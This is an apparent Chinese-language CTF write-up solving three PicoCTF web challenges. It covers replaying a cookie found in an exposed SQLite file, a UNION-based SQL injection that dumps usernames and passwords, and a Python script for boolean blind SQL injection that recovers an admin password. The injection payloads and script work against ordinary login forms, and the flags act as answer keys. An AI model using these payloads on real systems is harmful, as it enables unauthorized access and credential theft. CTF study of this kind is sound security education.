PicoCTF Level3 WriteUp

Web

Biscuit

打开题目,显示Access Denied,还有姜饼人的背景。

查看源代码,其中有注释。

1
2
<!-- Storing stuff in the same directory as your web server doesn't seem like a good idea -->
<!-- Thankfully, we use a hidden one that is super PRIVATE, to protect our cookies.sqlite file -->

提示我们去访问/private/cookies.sqlite文件。

下载到了cookies.sqlite,sqlite是一种轻型的数据库,要用sqlite3去打开他。

sqlite下载

1
2
3
4
E:\tools\sqlite-tools-win32-x86-3200000>sqlite3.exe cookies.sqlite
SQLite version 3.20.0 2017-08-01 13:24:15
Enter ".help" for usage hints.
sqlite>

然后根据sqlite的数据库结构查询cookie的值。

1
2
3
4
5
sqlite> SELECT * FROM sqlite_master WHERE type='table';
table|moz_cookies|moz_cookies|2|CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, baseDomain TEXT, appId INTEGER DEFAULT 0, inBrowserElement INTEGER DEFAULT 0, name TEXT, value TEXT, host TEXT, path TEXT, expiry INTEGER, lastAccessed INTEGER, creationTime INTEGER, isSecure INTEGER, isHttpOnly INTEGER, CONSTRAINT moz_uniqueid UNIQUE (name, host, path, appId, inBrowserElement))

sqlite> SELECT * FROM moz_cookies;
1|localhost|0|0|ID|F3MAqpWxIvESiUNLHsflVd|localhost|/|1489365457|1489279130600290|1489279057101857|0|0

F3MAqpWxIvESiUNLHsflVd就是数据库中存储的cookie中id的值。

将访问时的cookie修改成对应的,就可以得到flag。

flag:a31bbaad652b861dec1cdf7a7fe9fc9d

A Happy Union

1
2
3
4
I really need access to website, but I forgot my password and there is no reset. Can you help? I like lite sql :)

HINTS
A SQL union allows a single query to select values from multiples tables.

题目是一个登陆,注册界面,题目是A Happy Union,猜测要用到union select 注入,题目说忘记了自己的密码,也就是说我们要查询的是user的password,I like lite sql这句可能是在提示用的是sqlite的数据库。

从注册账号入手,随便注册了一个。
1
看到有三个显示的位置。

测试一下sql语句。

1
2
username:'or 1=1
password:111

2

sql语句完全没有过滤,被直接插入了查询语句中。

1
select id, user, post from posts where user = '' or 1=1';

sqlite数据库中有一个sqlite_master的表,储存了所有表的索引,我们select查询他就能获得表名。

1
2
username:' UNION SELECT null,null,name From sqlite_master ; --
password:111

有三个显示位,所以要用null来控制。这样sql语句就是

1
select id, user, post from posts where user = '' UNION SELECT null,null,name From sqlite_master ; --'

3

和想象的一样,直接查询user和pass了。

1
2
username:' UNION SELECT user,pass,null From users ; --
password:111

4

flag:flag{union?_why_not_onion_a69464d4869c743e26c08df8686e4003}

No Eyes

1
2
3
4
The website isn't really me much, but you can still get the admin password, right?

HINTS
Sometimes an error message can be just as useful.

这次的题目没有了注册页面,只有登陆,先测试。

输入admin,admin,返回Incorrect Password.

输入aaadmin,admin,返回User not Found.

输入admin',admin,请求错误,并返回了sql语句。

1
select * from users where user = 'admin'';

题目是no eyes,可以利用bool型盲注。

利用length函数查询pass的长度。

1
admin' and length(pass)=63; --

返回Incorrect Password.

直接利用python脚本。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#-*-coding:utf-8-*-

import requests
import time

url = 'http://shell2017.picoctf.com:40788/'

def check(payload):
postdata={'username':payload,'password':'11'}
#print url1
r = requests.post(url,postdata).content
#print r
return 'Incorrect Password.' in r

flag=''
s = r'1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@_{}'
for i in xrange(1,64):
for c in s:
payload = 'admin\' AND substr((pass),'+str(i)+',1)=\''+c+'\'; --'
#print payload
if check(payload):
flag += c
break
print flag

flag:not_all_errors_should_be_shown_3c826cdcbf6f146ac6f86e6b65d3b1de

###